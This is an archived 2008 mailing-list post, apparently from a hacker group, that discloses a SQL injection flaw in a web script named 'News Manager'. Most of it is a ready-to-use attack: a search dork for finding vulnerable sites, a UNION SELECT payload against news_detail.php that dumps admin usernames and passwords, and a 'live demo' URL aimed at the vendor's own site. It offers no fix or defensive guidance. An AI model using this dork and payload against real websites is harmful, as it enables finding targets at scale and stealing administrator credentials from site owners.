Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PR07-31: Unauthenticated SQL Injection, XSS on Login Page and Username Enumeration on DPSnet Case Progress

FC2 BLOG Cross-Site Scripting Vulnerabilities

[OPENX-SA-2008-002] OpenX 2.4.9 and 2.6.2 fix SQL injection vulnerability

OpenNMS Multiple Vulnerabilities

From:	Ghost hacker <ghost-r00t_(at)_hotmail.com>
Date:	09.10.2008
Subject:	News Manager Remote SQL Injection Vulnerability

#################################################################################
###################
# News Manager Remote SQL Injection Vulnerability                                                  #
# © Ghost Hacker , Real Hack Back :)                                                               #
#################################################################################
###################
#[~] Author : Ghost Hacker                                                                         #
#[~] Home page : www.Real-h.com  [Real Hack Back]                                                  #
#[~] Contact Me : Ghost-r00t@Hotmail.com                                                           #
#[~] Bug : SQL Injection                                                                           #
#[~] From : Kingdom Saudi Arabia                                                                   #
#[~] Name Script : News Manager                                                                    #
#[~] Download : http://www.preprojects.com/news.asp                                                #
#################################################################################
###################
#[~] Dork :                                                                                  
      #
# ©2006 PRE NEWS MANAGER | All Rights Reserved Or inurl:news_detail.php?nid=                       #
#[~] Exploit :                                                                                  
   #
#
http://xxxx/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,
password),3,5,6,7+from+admin--
#[~] live demo :                                                                                  
 #
# http://www.preproject.com/news
manager/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,
password),3,5,6,7+from+admin--
#################################################################################
###################
#[~]Greets :                                                                                  
     #
# Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , L&J TeaM      #
# Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr , PrO SpY , v4-team.com                                   #
# All Members Real Hack , All My Friends :)                                                        #
#################################################################################
###################
# Viva Real Hack - Real-h.com ..                                                                   #
#################################################################################
###################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/